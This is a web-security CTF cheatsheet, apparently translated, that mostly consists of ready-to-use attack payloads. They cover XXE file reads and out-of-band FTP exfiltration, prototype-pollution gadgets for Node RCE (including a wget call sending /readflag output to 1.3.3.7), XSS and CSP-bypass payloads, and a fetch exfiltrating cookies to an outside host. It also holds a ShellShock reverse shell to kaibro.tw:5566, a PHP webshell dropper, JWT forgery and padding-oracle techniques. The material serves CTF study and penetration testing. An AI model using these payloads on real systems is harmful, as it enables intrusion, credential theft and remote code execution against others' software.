<!ENTITY % file SYSTEM "file:///var/www/html/flag.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY f '%start;%file;%end;'>">
DoS
- Billion Laugh Attack
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
Chaining Phar deserialization
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [
<!ENTITY xxe SYSTEM "phar:///var/www/html/images/gginin/xxxx.jpeg" > ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text>
</svg>
- Example: MidnightSun CTF - Rubenscube
Error-based XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message[
<!ELEMENT message ANY >
<!ENTITY % NUMBER '<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%NUMBER;
]>
<message>a</message>
- Example: Google CTF 2019 Qual - bnv
Java XXE + FTP
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
<!ENTITY % dtd PUBLIC "-//OXML/XXE/EN" "http://127.0.0.1:8080/ftp.dtd">
%dtd;%ftp;%send;
]>
<ANY>xxe</ANY>
ftp.dtd:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % ftp "<!ENTITY % send SYSTEM 'ftp://fakeuser:%file;@127.0.0.1:2121'>">
or
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % ftp "<!ENTITY % send SYSTEM 'ftp://fakeuser:pass@127.0.0.1:2121/%file;'>">
- A normal OOB XXE fails when the file content contains \n
- In Java environments, some versions are not affected when the data goes out over FTP:
- < 7u141-b00 or < 8u131-b09: not affected by \n in the file
- > jdk8u131: the FTP connection can be established, but an exception is raised if the carried file content contains \n
- > jdk8u232: the FTP connection cannot be established; an exception is raised if the URL contains \n
SOAP
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://kaibro.tw:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
XInclude
<?xml version="1.0" encoding="UTF-8"?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="http://kaibro.tw/file.xml"></xi:include>
</root>
XSLT
Read local file:
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
Others
- Document XXE
- DOCX
- XLSX
- PPTX
- https://github.com/BuffaloWill/oxml_xxe
Prototype Pollution
goodshit = {}
goodshit.__proto__.password = "ggininder"
user = {}
console.log(user.password)
// => ggininder
let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)
// => 1 2
o3 = {}
console.log(o3.b)
// => 2
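The snippet above depends on a recursive merge that follows the "__proto__" key into Object.prototype. The following is an added example, not code from the cheatsheet: a minimal vulnerable merge next to a hardened one (function names are ours), both run against the same payload.

```javascript
// Added example, not from the cheatsheet: a merge that is vulnerable to prototype
// pollution next to a hardened one. Function and variable names are ours.
function isObject(v) {
  return v !== null && typeof v === 'object';
}

// Vulnerable: for...in sees the own key "__proto__" that JSON.parse created, and
// target["__proto__"] resolves to Object.prototype, so the recursion writes there.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isObject(source[key])) {
      if (!isObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: own keys only, the three names that reach a prototype are skipped,
// and nested containers are created without a prototype to inherit from.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isObject(value)) {
      if (!hasOwn(target, key) || !isObject(target[key])) {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs the payload from the snippet above through both merges and reports what
// an unrelated, freshly created object "sees" afterwards.
function demo() {
  const payload = '{"a": 1, "__proto__": {"b": 2}}';

  const o1 = unsafeMerge({}, JSON.parse(payload));
  const leakedIntoAllObjects = ({}).b;   // 2: Object.prototype.b now exists
  delete Object.prototype.b;             // undo the pollution for the rest of the process

  const o2 = safeMerge(Object.create(null), JSON.parse(payload));
  return {
    unsafeA: o1.a,                        // 1
    leakedIntoAllObjects,                 // 2
    safeA: o2.a,                          // 1
    safeB: o2.b,                          // undefined: "__proto__" was skipped
    cleanAfterSafe: ({}).b,               // undefined: Object.prototype untouched
  };
}
```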
jQuery
- CVE-2019-11358
- jQuery < 3.4.0, $.extend
let a = $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'))
console.log({}.devMode); // true
Lodash
- SNYK-JS-LODASH-608086
- versions < 4.17.17
- Trigger points: setWith(), set()
- Payload:
setWith({}, "__proto__[test]", "123")
set({}, "__proto__[test2]", "456")
- CVE-2020-8203
- versions < 4.17.16
- Trigger point: zipObjectDeep()
- Payload:
zipObjectDeep(['__proto__.z'],[123])
console.log(z)
// => 123
- CVE-2019-10744
- versions < 4.17.12
- Trigger point: defaultsDeep()
- Payload:
{"type":"test","content":{"prototype":{"constructor":{"a":"b"}}}}
- Example:
- CVE-2018-16487 / CVE-2018-3721
- versions < 4.17.11
- Trigger points: merge(), mergeWith(), defaultsDeep()
var _ = require('lodash');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';
var a = {};
_.merge({}, JSON.parse(malicious_payload));
Process Spawning
- If environment variables can be polluted and a process is spawned, there is a chance of RCE
const { exec, execSync, spawn, spawnSync, fork } = require('child_process');
// pollute
Object.prototype.env = {
NODE_DEBUG : 'require("child_process").execSync("touch pwned")//',
NODE_OPTIONS : '-r /proc/self/environ'
};
// method 1
fork('blank');
// method 2
spawn('node', ['blank']).stdout.pipe(process.stdout);
// method 3
console.log(spawnSync('node', ['blank']).stdout.toString());
// method 4
console.log(execSync('node blank').toString());
({}).__proto__.NODE_OPTIONS = '--require=./malicious-code.js';
console.log(spawnSync(process.execPath, ['subprocess.js']).stdout.toString());
({}).__proto__.NODE_OPTIONS = `--experimental-loader="data:text/javascript,console.log('injection');"`;
console.log(spawnSync(process.execPath, ['subprocess.js']).stdout.toString());
- If Object.prototype.shell can be controlled, spawning any command gives RCE
const child_process = require('child_process');
Object.prototype.shell = 'node';
Object.prototype.env = {
NODE_DEBUG : '1; throw require("child_process").execSync("touch pwned").toString()//',
NODE_OPTIONS : '-r /proc/self/environ'
};
child_process.execSync('id');
- Supplement: the various tricks with environment variables (https://blog.p6.is/Abusing-Environment-Variables/)
- Example
require
- Gadget for low versions
- Tested: Node 15.x, 16.x, 17.x all have a chance of working
a = {}
a["__proto__"]["exports"] = {".":"./pwn.js"}
a["__proto__"]["1"] = "./"
require("./index.js")
- Gadget for high versions
- Controlling the data and path parameters of trySelf allows arbitrary LFI
- Including a file already present in the environment, such as preinstall.js or yarn.js, gives RCE
- v18.8.0 works
{
  "__proto__": {
    "data": { "name": "./usage", "exports": "./preinstall.js" },
    "path": "/opt/yarn-v1.22.19/",
    "shell": "sh",
    "contextExtensions": [
      {
        "process": {
          "env": { "npm_config_global": "1", "npm_execpath": "" },
          "execPath": "wget\u0020http://1.3.3.7/?p=$(/readflag);echo"
        }
      }
    ]
  }
}
- Example
Misc
- https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf
- https://github.com/BlackFan/client-side-prototype-pollution
- https://github.com/msrkp/PPScan
- EJS RCE
- outputFunctionName
- It is concatenated straight into the template and executed
- Polluting it gives RCE:
Object.prototype.outputFunctionName = "x;process.mainModule.require('child_process').exec('touch pwned');x";
- Supplement: RCE without Prototype Pollution (misuse of ejs render)
- Root cause:
res.render('index.ejs', req.body);
- req.body can pollute options, which in turn pollutes outputFunctionName (HPP)
- Example: AIS3 EOF 2019 Quals - echo
Frontend
XSS
Cheat Sheet
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- https://tinyxss.terjanq.me/
- Tiny XSS Payload
Basic Payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=# onerror=alert(1)>
<a href="javascript:alert(1)">g</a>
<input type="text" value="g" onmouseover="alert(1)" />
<iframe src="javascript:alert(1)"></iframe>
- ...
Testing
<script>alert(1)</script>
'"><script>alert(1)</script>
<img/src=@ onerror=alert(1)/>
'"><img/src=@ onerror=alert(1)/>
' onmouseover=alert(1) x='
" onmouseover=alert(1) x="
`onmouseover=alert(1) x=`
javascript:alert(1)//
- ....
Bypass
- When // (the JavaScript comment) is filtered, an arithmetic operator can take its place
<a href="javascript:alert(1)-abcde">xss</a>
- HTML features
- Case insensitive
<ScRipT>
<img SrC=#>
- Attribute values
src="#"
src='#'
src=#
src=`#`
(IE)
- Encoding bypass (alert spelled with decimal HTML entities in the first line and hex entities in the second; semicolons can be dropped)
<svg/onload=alert(1)>
<svg/onload=alert(1)>
- Whitespace bypass
<img/src='1'/onerror=alert(0)>
- Parentheses bypass
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw[onerror]=[alert],1</script>
<script>var{a:onerror}={a:alert};throw 1</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>new Function`X${document.location.hash.substr`1`}```</script>
Others
- Special tags
- Scripts inside the following tags do not execute:
<title>, <textarea>, <iframe>, <plaintext>, <noscript> ...
- innerHTML
- A <script> inserted via innerHTML is not triggered
- Other tags work, e.g.:
<img src=@ onerror=alert()>
- double <svg> trick
<svg><svg onload=alert()>
- When inserted via innerHTML, it fires immediately
- Example
- Protocol
- javascript:
<a href=javascript:alert(1) >xss</a>
<iframe src="javascript:alert(1)">
- with new line:
<a href="javascript://%0aalert(1)">XSS</a>
- assignable protocol with location:
<script>location.protocol='javascript'</script>
- Example: portswigger cheatsheet
- data:
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==>xss</a>
- JavaScript auto-decoding
<input type="button" onclick="document.write('<img src=@ onerror=alert(1) />')" />
- alert(1) fires: the JavaScript sits inside HTML, so HTML entities are decoded before the JavaScript runs
- JavaScript wrapped in <script>, however, is not HTML-decoded
- The encoding here is HTML entities, in the &#xH; (hex) or &#D; (dec) form
- JavaScript has three pairs of encode/decode functions
- escape/unescape
- encodeURI/decodeURI
- encodeURIComponent/decodeURIComponent
- Some ways to call alert(document.domain)
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
[document.domain].map(alert);
window['alert'](document.domain);
alert.call(null,document.domain);
alert.bind()(document.domain);
- https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
- Some Payload
<svg/onload=alert(1);alert(2)>
<svg/onload="alert(1);alert(2)">
<svg/onload="alert(1);alert(2)">
- Changing ;; to ; fails
- The double quotes can be dropped
- Decimal and hex can be mixed
<svg/onload=\u0061\u006c\u0065\u0072\u0074(1)>
- The \u form only works inside JavaScript; e.g. changing the a of onload to \u0061 fails
<title><a href="</title><svg/onload=alert(1)>
- title takes priority and cuts off the other tags
<svg><script>prompt(1)</script>
- Because of <svg>, HTML entities get parsed
- Removing <svg> fails, because <script> does not parse entities
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<% foo="><script>alert(1)</script>">
- Markdown XSS
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
- ...
- SVG XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
- iframe srcdoc XSS
<iframe srcdoc="<svg/onload=alert(document.domain)>">
- Polyglot XSS
- Example: PlaidCTF 2018 wave XSS
- Upload a .wave file (signatures are checked)
RIFF`....WAVE...` alert(1); function RIFF(){}
- It becomes valid js syntax
- wave is not defined in Apache's mime types
<script src="uploads/this_file.wave">
- Text fragment
:~:text=xxx
- New feature in Chrome 80
- Chrome will scroll to and highlight the first instance of that text fragment
- Example
CSP evaluator
https://csp-evaluator.withgoogle.com/
Bypass CSP
- base
- Change where resources are loaded from, to pull in malicious js
<base href="http://kaibro.tw/">
- RCTF 2018 - rBlog
- script nonce
<p>controllable content<p> <script src="xxx" nonce="AAAAAAAAAAA"></script>
Insert
<script src="http://kaibro.tw/uccu.js" a="
<p><script src="http://kaibro.tw/uccu.js" a="<p> <script src="xxx" nonce="AAAAAAAAAAA"></script>
- Script Gadget
- https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
- is an existing JS code on the page that may be used to bypass mitigations
- Bypassing CSP strict-dynamic via Bootstrap
<div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'></div>
- Bypassing sanitizers via jQuery Mobile
<div data-role=popup id='--><script>alert(1)</script>'></div>
- Bypassing NoScript via Closure (DOM clobbering)
<a id=CLOSURE_BASE_PATH href=http://attacker/xss></a>
- Bypassing ModSecurity CRS via Dojo Toolkit
<div data-dojo-type="dijit/Declaration" data-dojo-props="}-alert(1)-{">
- Bypassing CSP unsafe-eval via underscore templates
<div type=underscore/template> <% alert(1) %> </div>
- 0CTF 2018 - h4xors.club2
- google analytics ea
- ea is used to log actions and can contain arbitrary string
- Google CTF 2018 - gcalc2
- known jsonp endpoint
- Google:
https://accounts.google.com/o/oauth2/revoke?callback=alert(1)
https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1
- JSONBee
- PHP Warnings
- In PHP, when any body data is returned before header() is called, the call is ignored: the response has already been sent, and headers must go out first
- Parameters limit: $_GET / $_POST accept at most 1000 parameters. A request with more than 1000 GET parameters produces a warning, and the CSP header won't
- Buffering
- PHP is known for buffering the response to 4096 bytes by default
- ref:
- DNS prefetch
<link rel="dns-prefetch" href="https://data.example.com">
- WebRTC
- Under a strict CSP, data can still be exfiltrated through it
- e.g.:
default-src 'none'; script-src 'unsafe-inline';
- WebRTC bypass CSP connect-src policies
async function a(){
  c={iceServers:[{urls:"stun:{{user.id}}.x.cjxol.com:1337"}]};
  (p=new RTCPeerConnection(c)).createDataChannel("d");
  await p.setLocalDescription();
}
a();
- Tool
Upload XSS
- htm
- html
- svg
- xml
- xsl
- rdf (firefox only? text/rdf, application/rdf+xml)
- vtt (IE/Edge only? text/vtt)
- shtml
- xhtml
- mht / mhtml
- var
- HITCON CTF 2020 - oStyle
- A default Apache install includes mod_negotiation, which allows setting the Content-* attributes of the response
Content-language: en
Content-type: text/html
Body:----foo----
<script>
fetch('http://orange.tw/?' + escape(document.cookie))
</script>
----foo----
Content-type
- XSS
- https://github.com/BlackFan/content-type-research/blob/master/XSS.md
- text/html
- application/xhtml+xml
- application/xml
- text/xml
- image/svg+xml
- text/xsl
- application/vnd.wap.xhtml+xml
- multipart/x-mixed-replace
- text/rdf
- application/rdf+xml
- application/mathml+xml
- text/vtt
- text/cache-manifest
jQuery
- $.getJSON / $.ajax XSS
- When the URL looks like
http://kaibro.tw/x.php?callback=anything
- it is automatically treated as a jsonp callback and executed as javascript
- Example: VolgaCTF 2020 Qualifier - User Center
Online Encoding / Decoding
JSFuck
aaencode / aadecode
- http://utf-8.jp/public/aaencode.html
- https://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html
RPO
- http://example.com/a%2findex.php
- The browser treats a%2findex.php as a single file
- The web server, however, resolves it normally as a/index.php
- So when CSS is loaded through a relative path, this makes the browser resolve files from another directory level
- If that file's content is controllable, there is a chance of XSS
- Example:
- /test.php contains <link href="1/" ...>
- If /1/index.php echoes the content of a ?query= parameter directly
- then visiting /1%2f%3Fquery={}*{background-color%3Ared}%2f..%2f../test.php turns the background red
- Server: /test.php
- Browser: /1%2f%3Fquery={}*{background-color%3Ared}%2f..%2f../test.php
- The CSS is loaded from /1/?query={}*{background-color:red}/../../1/
- CSS syntax is very fault tolerant
CSS Injection
- When CSS is controllable, it can leak information
- Example:
- leak
<input type='hidden' name='csrf' value='2e3d04bf...'>
input[name=csrf][value^="2"]{background: url(http://kaibro.tw/2)}
input[name=csrf][value^="2e"]{background: url(http://kaibro.tw/2e)}
- ...
- SECCON CTF 2018 - GhostKingdom
XS-Leaks
- Cross-Site Browser Side channel attack
- xsleaks wiki
Frame count
- Different states produce different numbers of frames
- Use window.frames.length to tell them apart
- State A => frame count = x
- State B => frame count = y
- x != y
- e.g. Facebook CTF - Secret Note Keeper
- Result found => frame count >= 1
- Not found => frame count = 0
Timing
- Different states have different response times
- Time(with results) > Time(without results)
- When there are results, more has to be loaded
XSS Filter
- A normal iframe load fires the onload event once
- Appending # to iframe.src and requesting again normally does not fire onload a second time
- But if the original page was blocked by the filter, there is a second onload
- The second request becomes chrome-error://chromewebdata/#
- So the page state can be determined
- Normal => 1 onload
- Blocked => 2 onloads
- history.length can also be used to tell
- e.g. 35C3 - filemanager
HTTP Cache
- Clear the target's cache
- Send a POST request
- Query the content
<link rel=prerender href="victim.com">
- Check whether the content got cached
- Set an overlong Referrer, then visit the resource
- Cached => the resource is shown
- Not cached => the resource cannot be fetched
DOM Clobbering
<form id=test1></form>
<form name=test2></form>
<script>
console.log(test1); // <form id=test1></form>
console.log(test2); // <form name=test2></form>
console.log(document.test1); // undefined
console.log(document.test2); // <form name=test2></form>
</script>
- The id attribute becomes a global variable
- The name attribute becomes a property of document
- Overriding native functions
<form name="getElementById"></form>
<form id="form"></form>
<script>
console.log(document.getElementById("form")); // Error
</script>
<script>
console.log("I'll be executed!");
</script>
Here the first script block is skipped because of the error, while the second script block still executes (often used to bypass checks)
- toString problem
<form id=test1><input name=test2></form>
<script>
alert(test1.test2); // "[object HTMLInputElement]"
</script>
- The href of <a> solves the toString problem:
<a id=test1 href=http://kaibro.tw>
alert(test1);
=> http://kaibro.tw
<form id=test1><a name=test2 href=http://kaibro.tw></form>
- This still has the problem:
alert(test1.test2);
=> undefined
- The solution is the HTMLCollection below
- HTMLCollection
<a id=test1>click!</a>
<a id=test1>click2!</a>
<script>
console.log(window.test1); // <HTMLCollection(2) [a#test1, a#test1, test1: a#test1]
</script>
- The name attribute also becomes a property of the HTMLCollection directly:
<a id="test1"></a>
<a id="test1" name="test2" href="x:alert(1)"></a>
<script>
alert(window.test1.test2); // x:alert(1)
</script>
Shadow DOM
- Attaches a hidden, separate DOM to an element
- Element.attachShadow() attaches a shadow root to an element
- The argument can be {mode:"open"} or {mode:"closed"}
- open: Elements of the shadow root are accessible from JavaScript outside the root
- closed: Denies access to the node(s) of a closed shadow root from JavaScript outside it
- window.find + -webkit-user-modify + document.execCommand
- Through the CSS property -webkit-user-modify:read-write, the shadow DOM becomes contenteditable
- Combined with window.find(), content inside the shadow DOM can be focused
- Then document.execCommand() can insert HTML, and an svg executes JS to grab the node
document.execCommand('insertHTML',false,'<svg/onload=alert(this.parentNode.innerHTML)>')
- Example
Cryptography
PRNG
- Since PHP 7.1.0, rand() and srand() have become aliases of mt_rand() and mt_srand()
- Test result: https://3v4l.org/PIUEo
- Since PHP 4.2.0, srand() and mt_srand() are seeded automatically
- Seeding happens only once, not on every rand() call
- From known random outputs the seed can be recovered, and from it the whole random sequence
- In practice the connection may not land on the same process; Keep-Alive ensures the same php process is used (it seeds only once)
- Before 7.1, rand() used libc random(), whose core is: state[i] = state[i-3] + state[i-31]
- So 31 consecutive outputs are enough to predict the following ones
- Later rand() became an alias of mt_rand(), which uses the Mersenne Twister algorithm
- Example: HITCON 2015 - Giraffe's Coffee
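The libc random() recurrence and the "31 consecutive outputs" claim above, as an added example (not from the cheatsheet): a reimplementation of glibc's default random() generator, which is what rand() in PHP below 7.1 wrapped on Linux, plus the prediction that needs no seed at all. Function names are ours, and the reimplementation assumes the default TYPE_3 glibc generator with a seed in 1..2^31-1.

```javascript
// Added example, not from the cheatsheet: glibc random() reimplemented, and the
// prediction of the next output from 31 previous ones. Names are ours.

// Reproduces glibc srandom()/random() (TYPE_3: degree 31, separation 3).
// Restricted to seeds in 1..2^31-1; glibc maps seed 0 to 1.
function glibcRandom(seed, count) {
  const INIT = 344;                         // 34 table entries + 310 discarded outputs
  const r = new Array(INIT + count);
  r[0] = seed === 0 ? 1 : seed;
  for (let i = 1; i < 31; i++) {
    // Park-Miller step: r[i] = 16807 * r[i-1] mod (2^31 - 1)
    r[i] = (16807 * r[i - 1]) % 2147483647;
  }
  for (let i = 31; i < 34; i++) r[i] = r[i - 31];
  for (let i = 34; i < INIT + count; i++) {
    // The additive lagged recurrence from the notes, taken mod 2^32
    r[i] = (r[i - 3] + r[i - 31]) >>> 0;
  }
  const out = [];
  for (let i = INIT; i < INIT + count; i++) out.push(r[i] >>> 1); // low bit dropped
  return out;
}

// The recurrence survives the dropped low bit up to one carry: the next output is
// (o[n-31] + o[n-3]) mod 2^31, or that value plus one. No seed is needed.
function predictNext(outputs) {
  const n = outputs.length;
  if (n < 31) throw new Error('need at least 31 consecutive outputs');
  const base = (outputs[n - 31] + outputs[n - 3]) % 0x80000000;
  return [base, (base + 1) % 0x80000000];
}

// Generates a stream for `seed` and checks that every output after the 31st is one
// of the two predicted candidates; returns the number of correct predictions.
// A rand() that fails this check (e.g. one fed by random_int()/getrandom()) is what
// a token generator should be using.
function verifyPrediction(seed, count) {
  const stream = glibcRandom(seed, count);
  let hits = 0;
  for (let n = 31; n < count; n++) {
    if (predictNext(stream.slice(0, n)).includes(stream[n])) hits++;
  }
  return hits;
}
```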
ECB mode
Cut and Paste Attack
- Every block is encrypted the same way, so blocks can be rearranged freely
- Example:
user=kaibro;role=user
- Assume the block length is 8
- Construct a user: (| separates the blocks)
user=aaa|admin;ro|le=user
user=aaa|aa;role=|user
- Splice them (the ciphertext of every block above is known)
user=aaa|aa;role=|admin;ro
- Example: AIS3 2017 pre-exam
Encryption Oracle Attack
- The result of ECB(K, A + B + C) is known
- B is controllable
- K, A, C are unknown
- The content of C can be recovered as follows:
- Find the smallest length L
- such that when B is L copies of a, the pattern repeats exactly twice
...bbbb bbaa aaaa aaaa cccc ...
...???? ???? 5678 5678 ???? ...
- With L-1 copies of a, the block ECB(K, "aa...a" + C[0]) is obtained
- C[0] can then be brute-forced, and the rest follows the same way
- Common scenario: Cookie
CBC mode
Bit Flipping Attack
- Assume the IV is A, the intermediate value is B (the block decryption result), and the plaintext is C
- In CBC decryption:
A XOR B = C
- To make the output plaintext X
- change A to
A XOR C XOR X
- The original equation becomes
(A XOR C XOR X) XOR B = X
Padding Oracle Attack
PKCS#7
- Padding: when x bytes are missing, pad with x copies of the byte x
- e.g. block length 8
AA AA AA AA AA AA AA 01
AA AA AA AA AA AA 02 02
AA AA AA AA AA 03 03 03
- ...
08 08 08 08 08 08 08 08
- Normally, if the decrypted padding turns out to be wrong, an Exception or Error is thrown
- e.g. HTTP 500 Internal Server Error
- Note that the following cases do not raise an error:
AA AA AA AA AA AA 01 01
AA AA 02 02 02 02 02 02
- Principle:
- In CBC mode, the previous ciphertext block is used as the IV of the current block and XORed in
- If A||B is submitted for decryption (A, B are ciphertext blocks), A is used as B's IV and B decrypts to
D(B) XOR A
- By adjusting A so that the padding becomes valid, the value of D(B) is obtained
- e.g. to recover the last byte
- find an A that makes the decryption end in 01
- with bad luck it may end in 02 02 instead; then adjust the second-to-last byte of A
D(B)[-1] XOR A[-1] = 01
D(B)[-1] = A[-1] XOR 01
- Once the last byte is known, continue the same way with the second-to-last byte
- D(B) XOR C gives the plaintext (C is the real ciphertext of the previous block)
Length Extension Attack
- Many hash algorithms are susceptible to this attack, e.g. md5, sha1, sha256 ...
- Mainly because they all use the Merkle-Damgard hash construction
- The input is processed in 64-byte blocks; a short final block is padded
- 1 byte of 0x80 + some 0x00 + 8 bytes of length
- The IV is hard-coded, and each block's output becomes the next block's input
- Attack conditions (md5 here; sha1, sha256... work the same way)
- known: md5(secret+message)
- known: length of secret
- known: content of message
- With these three conditions one can construct
md5(secret+message+padding+arbitrary string)
- Tool: hashpump
- Basic usage:
- input the value of md5(secret+message)
- input the value of message
- input the secret length
- input the string to append
- It finally outputs
md5(secret+message+padding+arbitrary string)
and
message+padding+arbitrary string
Others
- Information leak
- .git / .svn
- robots.txt
- /.well-known
- .DS_Store
- .htaccess
- .pyc
- package.json
- server-status
- crossdomain.xml
- admin/ manager/ login/ backup/ wp-login/ phpMyAdmin/
- xxx.php.bak / www.tar.gz / .xxx.php.swp / xxx.php~ / xxx.phps
- /WEB-INF/web.xml
- File parsing vulnerabilities
- Apache
- shell.php.ggininder
- shell.php%0a
- httpd 2.4.0 to 2.4.29
- CVE-2017-15715
- IIS
- IIS < 7
- a.asp/user.jpg
- user.asp;aa.jpg
- Nginx
- nginx < 8.03
cgi.fix_pathinfo=1
- With Fast-CGI enabled
- kaibro.jpg:
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
- Visiting kaibro.jpg/.php generates shell.php
- Common AWS vulnerabilities
- S3 bucket permission misconfiguration
- Identify with nslookup
nslookup 87.87.87.87
s3-website-us-west-2.amazonaws.com.
- Confirm the bucket
- Visit bucketname.s3.amazonaws.com
- On success it returns the bucket's XML listing
- awscli tool
- List directory
aws s3 ls s3://bucketname/ --region regionname
- Download
aws s3 sync s3://bucketname/ localdir --region regionname
- metadata
- JWT (Json Web Token)
- Set the algorithm to None
import jwt; print(jwt.encode({"userName":"admin","userRoot":1001}, key="", algorithm="none")[:-1])
- Algorithm downgrade
- Downgrade "asymmetric" signing to "symmetric" signing
- e.g. RS256 changed to HS256
import jwt
public = open('public.pem', 'r').read()  # public key
print(jwt.encode({"user":"admin","id":1}, key=public, algorithm='HS256'))
- Brute-forcing the key
- Tool: JWT Cracker
- usage:
./jwtcrack eyJhbGci....
- Example:
- kid parameter (key ID)
- An optional parameter
- Used to specify the key for the signing algorithm
- Arbitrary file read
"kid" : "/etc/passwd"
- SQL injection
- kid may be fetched from a database
"kid" : "key11111111' || union select 'secretkey' -- "
- Command Injection
- Ruby open:
"/path/to/key_file|whoami"
- Example: HITB CTF 2017 - Pasty
- jku
- Specifies the URL from which the key used for the token is fetched
- If unrestricted, an attacker can point it at their own key file and have the token verified with it
- Example: VolgaCTF 2021 Qual - JWT
- Sensitive information leak
- JWT guarantees integrity, not confidentiality
- base64-decoding gives the payload content
- Example
- jwt.io
Common port services
- php -i | grep "Loaded Configuration File"
- Prints the php.ini path
- HTTP Method
- OPTIONS method
- Lists the available HTTP methods
curl -i -X OPTIONS 'http://evil.com/'
- HEAD method
- In special scenarios it easily leads to logic bugs
if(request.method == get) {...} else {...}
- Werkzeug automatically accepts HEAD whenever a route is configured to accept GET (ref)
- Example:
- ShellShock
() { :; }; echo vulnerable
() { :a; }; /bin/cat /etc/passwd
() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/kaibro.tw/5566 0>&1'
- X-Forwarded-For to spoof the source IP
Client-IP
X-Client-IP
X-Real-IP
X-Remote-IP
X-Remote-Addr
X-Host
- ...
- Bypassing all kinds of limits (e.g. rate limit bypass)
- Heroku feature
- https://jetmind.github.io/2016/03/31/heroku-forwarded.html
- Sending several X-Forwarded-For headers at once can bury the real IP in the middle of the IP list (Spoofing)
- Example: angstromCTF 2021 - Spoofy
- DNS Zone Transfer
dig @1.2.3.4 abc.com axfr
- DNS Server: 1.2.3.4
- Test Domain: abc.com
- IIS short filename guessing
- Windows 8.3 format: administrator can be abbreviated as admini~1
- Principle: the server responds differently depending on whether the short name exists
- Example
- MidnightSun CTF 2024 - ASPowerTools
webClient.DownloadString("http://../inetpub/wwwroot/aspowertools/FLAGFL~1.MAS")
- Tool:
- https://github.com/irsdl/IIS-ShortName-Scanner
java -jar iis_shortname_scanner.jar 2 20 http://example.com/folder/
- https://github.com/sw33tLie/sns
- ASP.net Cookieless DuoDrop (CVE-2023-36899 & CVE-2023-36560)
- CVE-2023-36899
/WebForm/(S(X))/prot/(S(X))ected/target1.aspx
/WebForm/(S(X))/b/(S(X))in/target2.aspx
- CVE-2023-36560
/WebForm/pro/(S(X))tected/target1.aspx/(S(X))/
/WebForm/b/(S(X))in/target2.aspx/(S(X))/
- Example
- MidnightSun CTF 2024 - ASPowerTools
/(S(x))/b/(S(x))in/ASPowerTools.dll
/(S(X))/prot/(S(X))ected/login.aspx
- ref:
- NodeJS unicode failure
- Internally uses UCS-2 encoding
ＮＮ => ..
- Ｎ is \xff\x2e
- The first byte is discarded during conversion
- Special CRLF Injection bypass
%E5%98%8A
